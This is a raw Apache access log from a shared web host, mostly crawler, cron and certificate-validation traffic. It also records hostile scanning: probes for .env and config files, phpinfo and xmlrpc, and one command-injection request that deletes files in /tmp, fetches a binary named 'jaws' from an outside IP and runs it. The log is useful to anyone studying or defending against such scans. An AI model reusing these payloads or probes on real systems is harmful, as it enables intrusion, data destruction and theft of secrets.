168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/themes/en-vision/includes/modules/module.fontawesome/source/css/font-awesome.min.css HTTP/1.1" 200 4680 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/themes/en-vision/includes/modules/module.icomoon/source/css/icomoon.css HTTP/1.1" 200 8420 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-css/ultimate.min.css HTTP/1.1" 200 47736 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/shapepress-dsgvo/public/css/simplebar.min.css HTTP/1.1" 200 836 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/uploads/Dark-Blue-Skin_f11de704061eed4e79d777b4e0c313ab.css?OlJKPnf0ao HTTP/1.1" 200 4393 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/revslider/public/assets/css/rs6.css HTTP/1.1" 200 12282 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 6970 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/revslider/public/assets/fonts/revicons/revicons.woff?5510888 HTTP/1.1" 200 7491 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/revslider/public/assets/fonts/font-awesome/css/font-awesome.css HTTP/1.1" 200 7235 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/revslider/public/assets/fonts/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77162 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-includes/js/jquery/jquery.js HTTP/1.1" 200 33776 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/revslider/public/assets/js/rbtools.min.js HTTP/1.1" 200 46966 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js HTTP/1.1" 200 98542 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1" 200 4014 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js HTTP/1.1" 200 3533 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/cache/autoptimize/js/autoptimize_single_902b7ca09549975e55e136fb0026df9a.js HTTP/1.1" 200 319 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js HTTP/1.1" 200 1017 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/shapepress-dsgvo/public/js/sp-dsgvo-public.min.js HTTP/1.1" 200 4590 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/autoptimize/classes/external/js/lazysizes.min.js HTTP/1.1" 200 4122 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/cache/autoptimize/js/autoptimize_single_9ff8e720094fe3a7fa3ab5a2e8fe5919.js HTTP/1.1" 200 587 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/cache/autoptimize/js/autoptimize_single_1534f06aa2b1b721a45372f8238e2461.js HTTP/1.1" 200 3352 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/themes/en-vision/lib/js/app.min.js HTTP/1.1" 200 31108 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js HTTP/1.1" 200 981 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js HTTP/1.1" 200 619 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ultimate.min.js HTTP/1.1" 200 54140 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js HTTP/1.1" 200 1042 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "GET /wp-content/themes/en-vision/lib/js/woocommerce.min.js HTTP/1.1" 200 1122 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:38 +0100] "GET /wp-content/plugins/shapepress-dsgvo/public/js/simplebar.min.js HTTP/1.1" 200 18376 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "GET /wp-content/themes/en-vision/lib/js/jquery-smoothscroll.min.js HTTP/1.1" 200 2546 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "GET /wp-includes/js/comment-reply.min.js HTTP/1.1" 200 1044 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "GET /wp-includes/js/wp-embed.min.js HTTP/1.1" 200 777 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "GET /wp-content/plugins/shapepress-dsgvo/public/css/fonts/roboto/Roboto-Regular-webfont.woff HTTP/1.1" 200 20862 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77162 "https://www.computerdoc24.de/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "GET /wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js HTTP/1.1" 200 5653 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "GET /wp-content/uploads/smile_fonts/Defaults/Defaults.woff?rfa9z8 HTTP/1.1" 200 66219 "https://www.computerdoc24.de/wp-content/uploads/smile_fonts/Defaults/Defaults.css" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "POST /?wc-ajax=get_refreshed_fragments HTTP/1.1" 200 177 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
168.119.65.0 - - [08/Nov/2023:01:48:39 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 4778 "https://www.computerdoc24.de/" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
:: - - [08/Nov/2023:01:48:44 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
54.36.149.0 - - [08/Nov/2023:01:48:46 +0100] "GET /wp-content/uploads/Network-1.png HTTP/1.1" 200 55283 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [08/Nov/2023:01:48:46 +0100] "GET /wp-content/uploads/revslider/homepage/slider.png HTTP/1.1" 200 18173 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [08/Nov/2023:01:48:46 +0100] "GET /wp-content/uploads/revslider/homepage/computer.png HTTP/1.1" 200 206463 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
83.97.73.0 - - [08/Nov/2023:01:50:56 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
81.169.178.0 - - [08/Nov/2023:01:51:01 +0100] "POST /wp-cron.php?doing_wp_cron=1699404661.3576519489288330078125 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699404661.3576519489288330078125" "WordPress/5.8.8; https://www.ipcbusiness.de"
114.119.146.0 - - [08/Nov/2023:01:51:01 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
60.188.57.0 - - [08/Nov/2023:01:52:59 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
141.98.11.0 - - [08/Nov/2023:01:59:23 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
194.38.22.0 - - [08/Nov/2023:01:59:49 +0100] "GET /admin/plugins/blueimp/server/php/index.php HTTP/1.1" 200 2691 "-" "ALittle Client"
80.66.79.0 - - [08/Nov/2023:02:02:24 +0100] "GET / HTTP/1.1" 200 2691 "https://vsdelke.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
80.66.79.0 - - [08/Nov/2023:02:02:24 +0100] "GET / HTTP/1.1" 200 2691 "https://vsdelke.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
80.66.79.0 - - [08/Nov/2023:02:02:25 +0100] "GET / HTTP/1.1" 200 2691 "https://vsdelke.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
54.189.139.0 - - [08/Nov/2023:02:06:34 +0100] "GET /.well-known/acme-challenge/jDghBbXu2vfqkhA-3qtX7VEmHYH9P6WZYjciRBy-o74 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.222.129.0 - - [08/Nov/2023:02:06:35 +0100] "GET /.well-known/acme-challenge/jDghBbXu2vfqkhA-3qtX7VEmHYH9P6WZYjciRBy-o74 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.0 - - [08/Nov/2023:02:06:35 +0100] "GET /.well-known/acme-challenge/jDghBbXu2vfqkhA-3qtX7VEmHYH9P6WZYjciRBy-o74 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
188.34.158.0 - - [08/Nov/2023:02:07:30 +0100] "GET / HTTP/1.1" 200 95740 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
81.169.178.0 - - [08/Nov/2023:02:07:30 +0100] "POST /wp-cron.php?doing_wp_cron=1699405650.6592099666595458984375 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699405650.6592099666595458984375" "WordPress/5.2.19; https://www.computerdoc24.de"
107.170.254.0 - - [08/Nov/2023:02:09:02 +0100] "GET / HTTP/1.1" 403 2411 "-" "Mozilla/5.0 zgrab/0.x"
85.25.185.0 - - [08/Nov/2023:02:10:52 +0100] "GET /robots.txt HTTP/1.1" 404 2607 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
85.25.185.0 - - [08/Nov/2023:02:10:52 +0100] "GET /html/vorher_nachher.html HTTP/1.1" 200 2132 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.6.0 - - [08/Nov/2023:02:11:07 +0100] "GET /assets/images/img-20141213-wa0001.jpg HTTP/1.1" 200 54449 "http://www.reinigungsprofi-weck.de/html/vorher_nachher.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
62.138.3.0 - - [08/Nov/2023:02:11:07 +0100] "GET /assets/images/20150307_182429.jpg HTTP/1.1" 200 130698 "http://www.reinigungsprofi-weck.de/html/vorher_nachher.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
92.116.189.0 - - [08/Nov/2023:02:14:23 +0100] "GET / HTTP/1.0" 403 2411 "-" "-"
41.45.148.0 - - [08/Nov/2023:02:14:34 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+91.92.243.35/jaws;sh+/tmp/jaws HTTP/1.1" 200 2691 "-" "Hello, world"
54.185.132.0 - - [08/Nov/2023:02:21:53 +0100] "GET /.well-known/acme-challenge/JyaYe8EQuIGVH0S1lRT1Rm6-P59A6cdo6wPpULN830M HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.222.129.0 - - [08/Nov/2023:02:21:53 +0100] "GET /.well-known/acme-challenge/JyaYe8EQuIGVH0S1lRT1Rm6-P59A6cdo6wPpULN830M HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.0 - - [08/Nov/2023:02:21:53 +0100] "GET /.well-known/acme-challenge/JyaYe8EQuIGVH0S1lRT1Rm6-P59A6cdo6wPpULN830M HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.0 - - [08/Nov/2023:02:22:14 +0100] "GET /.well-known/acme-challenge/M-7iU83i3vgMF1tiwWLhscQW__APtPar-Fafc9BmGDs HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
18.222.129.0 - - [08/Nov/2023:02:22:14 +0100] "GET /.well-known/acme-challenge/M-7iU83i3vgMF1tiwWLhscQW__APtPar-Fafc9BmGDs HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
3.17.62.0 - - [08/Nov/2023:02:22:26 +0100] "GET /.well-known/acme-challenge/-4J88ONUnZ_Z8T7ULUCsk1eAwFzmUJCGvq1daKhX7e8 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.0 - - [08/Nov/2023:02:22:27 +0100] "GET /.well-known/acme-challenge/-4J88ONUnZ_Z8T7ULUCsk1eAwFzmUJCGvq1daKhX7e8 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
54.185.132.0 - - [08/Nov/2023:02:22:27 +0100] "GET /.well-known/acme-challenge/-4J88ONUnZ_Z8T7ULUCsk1eAwFzmUJCGvq1daKhX7e8 HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
65.157.23.0 - - [08/Nov/2023:02:25:27 +0100] "GET /laravel/.env HTTP/1.1" 404 2555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.157.23.0 - - [08/Nov/2023:02:25:27 +0100] "POST /laravel HTTP/1.1" 404 2545 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
206.189.11.0 - - [08/Nov/2023:02:25:42 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
54.36.149.0 - - [08/Nov/2023:02:28:24 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.0 - - [08/Nov/2023:02:28:25 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
183.136.225.0 - - [08/Nov/2023:02:29:02 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
161.35.185.0 - - [08/Nov/2023:02:31:02 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
62.122.184.0 - - [08/Nov/2023:02:34:38 +0100] "GET / HTTP/1.0" 200 2691 "http://gamers-land.de/" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
91.92.241.0 - - [08/Nov/2023:02:35:23 +0100] "GET /frontend_dev.php/$ HTTP/1.1" 404 2567 "-" "python-requests/2.31.0"
143.110.213.0 - - [08/Nov/2023:02:35:37 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
91.92.241.0 - - [08/Nov/2023:02:35:38 +0100] "GET /example.php HTTP/1.1" 404 2553 "-" "python-requests/2.31.0"
91.92.241.0 - - [08/Nov/2023:02:35:55 +0100] "GET /config.js HTTP/1.1" 404 2549 "-" "python-requests/2.31.0"
91.92.241.0 - - [08/Nov/2023:02:35:55 +0100] "GET /config.json HTTP/1.1" 404 2553 "-" "python-requests/2.31.0"
91.92.241.0 - - [08/Nov/2023:02:35:55 +0100] "GET /_profiler/phpinfo HTTP/1.1" 404 2565 "-" "Mozila/5.0"
91.92.241.0 - - [08/Nov/2023:02:35:55 +0100] "POST / HTTP/1.1" 404 2531 "-" "python-requests/2.31.0"
91.92.241.0 - - [08/Nov/2023:02:35:55 +0100] "GET /.env HTTP/1.1" 404 2539 "-" "Mozila/5.0"
91.92.241.0 - - [08/Nov/2023:02:35:55 +0100] "POST / HTTP/1.1" 404 2531 "-" "python-requests/2.31.0"
91.92.241.0 - - [08/Nov/2023:02:35:55 +0100] "GET /laravel/.env HTTP/1.1" 404 2555 "-" "Mozila/5.0"
91.92.241.0 - - [08/Nov/2023:02:35:56 +0100] "POST / HTTP/1.1" 404 2531 "-" "python-requests/2.31.0"
91.92.241.0 - - [08/Nov/2023:02:35:56 +0100] "GET /.env.save HTTP/1.1" 404 2549 "-" "Mozila/5.0"
91.92.241.0 - - [08/Nov/2023:02:35:56 +0100] "POST / HTTP/1.1" 404 2531 "-" "python-requests/2.31.0"
91.92.241.0 - - [08/Nov/2023:02:35:56 +0100] "GET /.env.bak HTTP/1.1" 404 2547 "-" "Mozila/5.0"
91.92.241.0 - - [08/Nov/2023:02:35:56 +0100] "POST / HTTP/1.1" 404 2531 "-" "python-requests/2.31.0"
91.92.241.0 - - [08/Nov/2023:02:35:56 +0100] "GET /frontend_dev.php/$ HTTP/1.1" 404 2567 "-" "Mozila/5.0"
91.92.241.0 - - [08/Nov/2023:02:35:56 +0100] "POST / HTTP/1.1" 404 2531 "-" "python-requests/2.31.0"
147.182.233.0 - - [08/Nov/2023:02:39:23 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
143.110.213.0 - - [08/Nov/2023:02:39:24 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.0; +https://openai.com/gptbot)"
51.222.253.0 - - [08/Nov/2023:02:50:55 +0100] "GET /robots.txt HTTP/1.1" 404 2595 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.149.0 - - [08/Nov/2023:02:50:57 +0100] "GET / HTTP/1.1" 200 2590 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [08/Nov/2023:02:50:59 +0100] "GET /assets/images/autogen/Spezialreinigung-_Hhighlighted_1_1.gif HTTP/1.1" 200 1750 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
83.97.73.0 - - [08/Nov/2023:02:56:22 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 2577 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
50.63.3.0 - - [08/Nov/2023:02:58:33 +0100] "GET /style.php?sig=rename HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
50.63.3.0 - - [08/Nov/2023:02:58:34 +0100] "GET /style.php?sig=rename HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
81.169.178.0 - - [08/Nov/2023:02:58:34 +0100] "POST /wp-cron.php?doing_wp_cron=1699408714.7207810878753662109375 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1699408714.7207810878753662109375" "WordPress/5.8.8; https://www.ipcbusiness.de"
50.63.3.0 - - [08/Nov/2023:02:58:36 +0100] "GET /style.php?sig=rename HTTP/1.1" 200 41020 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
54.36.148.0 - - [08/Nov/2023:03:09:50 +0100] "GET /robots.txt HTTP/1.1" 200 69 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [08/Nov/2023:03:09:51 +0100] "GET /en/ HTTP/1.1" 200 16074 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
85.25.185.0 - - [08/Nov/2023:03:12:21 +0100] "GET /robots.txt HTTP/1.1" 404 2607 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
85.25.185.0 - - [08/Nov/2023:03:12:21 +0100] "GET /html/vorher_nachher.html HTTP/1.1" 200 2132 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
81.169.178.0 - - [08/Nov/2023:03:12:49 +0100] "POST /wp-cron.php?doing_wp_cron=1699409569.1839590072631835937500 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1699409569.1839590072631835937500" "WordPress/5.2.19; https://www.computerdoc24.de"
203.128.6.0 - - [08/Nov/2023:03:12:48 +0100] "POST /xmlrpc.php HTTP/1.1" 503 7313 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
54.36.148.0 - - [08/Nov/2023:03:13:52 +0100] "GET /robots.txt HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.0 - - [08/Nov/2023:03:13:53 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
188.138.25.0 - - [08/Nov/2023:03:14:17 +0100] "GET /robots.txt HTTP/1.1" 404 2591 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
188.138.25.0 - - [08/Nov/2023:03:14:17 +0100] "GET /sitemap.xml HTTP/1.1" 404 2593 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0"
185.180.143.0 - - [08/Nov/2023:03:15:33 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.0 - - [08/Nov/2023:03:15:34 +0100] "GET /favicon.ico HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
60.217.75.0 - - [08/Nov/2023:03:15:41 +0100] "GET / HTTP/1.1" 403 2409 "-" "Mozilla/5.0"
78.153.140.0 - - [08/Nov/2023:03:17:42 +0100] "GET / HTTP/1.0" 400 362 "-" "-"
78.153.140.0 - - [08/Nov/2023:03:17:42 +0100] "GET /.env HTTP/1.1" 404 2543 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
69.160.160.0 - - [08/Nov/2023:03:21:04 +0100] "GET / HTTP/1.1" 200 2691 "http://gamers-land.de" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Nicecrawler/1.1; +http://www.nicecrawler.com/) Chrome/90.0.4430.97 Safari/537.36"
69.160.160.0 - - [08/Nov/2023:03:21:05 +0100] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/78.0.3904.70 Safari/537.36"
